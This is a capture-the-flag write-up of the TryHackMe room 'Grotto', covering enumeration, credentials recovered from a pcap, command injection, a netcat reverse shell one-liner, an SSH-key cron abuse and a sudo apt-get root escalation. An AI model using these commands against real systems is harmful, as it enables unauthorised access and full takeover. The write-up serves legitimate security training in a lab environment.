CatSec.org

Grotto

In this post, we will look into the room “Grotto” from TryHackMe, which can be found on https://tryhackme.com

Enumeration

I started with port scanning with nmap:

$ sudo nmap 10.10.x.x -Pn -A -p- -oN nmap.log

Host is up (0.043s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 74:e0:e1:b4:05:85:6a:15:68:7e:16:da:f2:c7:6b:ee (RSA)
|   256 bd:43:62:b9:a1:86:51:36:f8:c7:df:f9:0f:63:8f:a3 (ECDSA)
|_  256 f9:e7:da:07:8f:10:af:97:0b:32:87:c9:32:d7:1b:76 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Smag
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The webserver on port 80 seemed most interesting. Nothing immediately grabbed my attention, and so I looked to directory fuzzing with gobuster:

$ sudo gobuster -u 10.10.x.x -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log
/redacted (Status: 301)

The redacted directory had a pcap file ready for download, and it also mentioned to grab the file using wget:

$ wget 10.10.x.x/redacted/dHJhY2Uy.pcap

Due to the pcap extension of the file, I assumed this was going to involve packet analysis with wireshark:

There was a single HTTP request, and since it was unencrypted, I could right click the POST request and click Follow HTTP Stream.

I found some credentials within the request, as well as a virtual host within the Host header:

I added the virtual host to my hosts file:

$ sudo bash -c 'echo "10.10.x.x	redacted.thm" >> /etc/hosts'

I could then access the webserver being served on this host. A directory listing is returned with two pages, of which one redirects to the other.

I could then log in to the webserver with the credentials found earlier.

Exploitation

The page returned asked for a command, and sending sleep 5; confirms code execution as the page took five seconds to respond.

I set up a netcat listener to catch a reverse shell on port 1234:

$ nc -lvnp 1234

I then sent a netcat reverse shell: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.x.x.x 1234 >/tmp/f

The reverse shell was caught and I had a shell as www-data.

User Privilege Escalation

I checked the cronjobs running, and there was an interesting entry which copies a file into the user's authorized_keys file:

# cat /etc/crontab

The file that was being copied was world writeable, which meant I could generate an SSH keypair:

$ ssh-keygen
$ chmod 600 id_rsa*

I could then copy my public key into the file found:

# scp kali@10.x.x.x:~/smaggrotto/id_rsa.pub ./redacted

I could then log in with SSH:

$ ssh -i id_rsa redacted@10.10.x.x

I got in, and grabbed the user.txt.

Root Privilege Escalation

I checked the user sudo privileges, and I could run a command as sudo:

# sudo -l
User redacted may run the following commands on smag:
	(ALL : ALL) NOPASSWD: /usr/bin/apt-get

I abused apt-get with the help of GTFOBins:

# sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/bash

I then got a shell as root, and grabbed the root.txt.